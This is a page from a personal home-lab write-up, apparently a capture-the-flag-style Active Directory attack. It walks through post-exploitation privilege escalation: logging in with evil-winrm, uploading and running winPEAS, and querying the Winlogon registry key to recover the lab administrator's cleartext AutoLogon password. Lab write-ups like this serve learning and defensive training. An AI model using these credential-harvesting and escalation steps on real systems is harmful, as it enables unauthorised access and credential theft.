Whoami
  • Welcome
  • Home Lab: C2 Detection, Ransomware Defense & YARA Automation
    • SOC Lab – What is this Lab about ?
    • Part 1 - Setting Up the Environment
    • Part 2 - Detecting C2 Activity
    • Part 3 - Credential Dumping & Threat Detection
    • Part 4 - Blocking Ransomware
    • Part 5 - Reducing False Positives
    • Part 6 - Automated YARA Scanning
  • Automation Lab - Home Project
    • Sysmon Installation
    • Wazuh & TheHive: Installation, Configuration, and Optimization
    • Tracking Mimikatz Activity with Wazuh & Sysmon Logs
    • End-to-End Alert Automation: Wazuh → Shuffle → TheHive
  • Active Directory Attack Lab: Recon-to-Root
    • Reconnaissance Phase
      • 1. Full TCP Port Scan on Target Host
      • 2. Service and Version Detection
      • 3. Null Session SMB Enumeration
      • 4. LDAP Anonymous Bind Check
      • 5. Kerberos Username Enumeration
      • 6. Password Brute Force via SMB Login
    • Exploitation Phase
      • 7. Dump Domain Information via LDAP
      • 8. Perform Remote AD Recon with BloodHound
      • 9. Set Up Neo4j and Launch BloodHound GUI
      • 10. Abuse ForceChangePassword Right via RPC
      • 11. Validate New Credentials via WinRM
      • 12. Enumerate Local Privileges and AutoLogon
      • 13. Reuse Administrator Credentials
      • 14. Capture the User Flag
  • QRadar101 Lab Challenge
    • Scenario and Instructions
    • The Walkthrough
Powered by GitBook
On this page
  • 🔧 Step-by-Step: Run winPEASx64.exe to Find PrivEsc Vectors:
  • To get AutoLogon Credentials (manually via WinRM)
  1. Active Directory Attack Lab: Recon-to-Root
  2. Exploitation Phase

12. Enumerate Local Privileges and AutoLogon

Previous11. Validate New Credentials via WinRMNext13. Reuse Administrator Credentials

Last updated 24 days ago

We're now in the post-exploitation phase with access to the system as sysadmin. Our goal is privilege escalation — gaining full control (Administrator or SYSTEM access).

🔧 Step-by-Step: Run winPEASx64.exe to Find PrivEsc Vectors:

1. 📁 Upload winPEASx64.exe to the target via evil-winrm

From your Kali machine, in the same folder where winPEASx64.exe is saved:

evil-winrm -i 192.168.10.4 -u 'sysadmin' -p 'NewPassword123'

Once inside the shell:

upload winPEASx64.exe

It will upload the file to the current directory (usually C:\Users\sysadmin\).

2. 🧠 Run winPEASx64.exe inside the shell

After upload completes, run:

.\winPEASx64.exe

Let it run fully — it will check:

  • 🔐 Stored credentials (AutoLogon, saved RDP passwords, etc.)

  • ⚙️ Misconfigured services (e.g., unquoted paths)

  • 📦 Files with weak permissions

  • 🔼 PrivEsc misconfigs (AlwaysInstallElevated, etc.)

3. 🔍 Look for These in Output

Pay attention to:

  • AutoLogon credentials ➜ cleartext passwords

  • AlwaysInstallElevated ➜ lets any user install MSI as SYSTEM

  • Unquoted service paths ➜ exploitable services

  • Writable services ➜ can hijack a service

  • Credential files in registry or config folders

To get AutoLogon Credentials (manually via WinRM)

Once you're inside using evil-winrm:

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Look for these keys in the output:

  • DefaultUserName

  • DefaultPassword ← this is what you want!

  • AutoAdminLogon (should be set to 1 if enabled)

The AutoLogon password configured for the administrator user is:

d0m@in_c0ntr0ll3r

📌 Found in this registry value:

DefaultUserName    REG_SZ    administrator
DefaultPassword    REG_SZ    d0m@in_c0ntr0ll3r

So the full AutoLogon credentials are:

  • Username: administrator

  • Password: d0m@in_c0ntr0ll3r

We can now try using these credentials for SMB, WinRM, or any service that accepts domain login.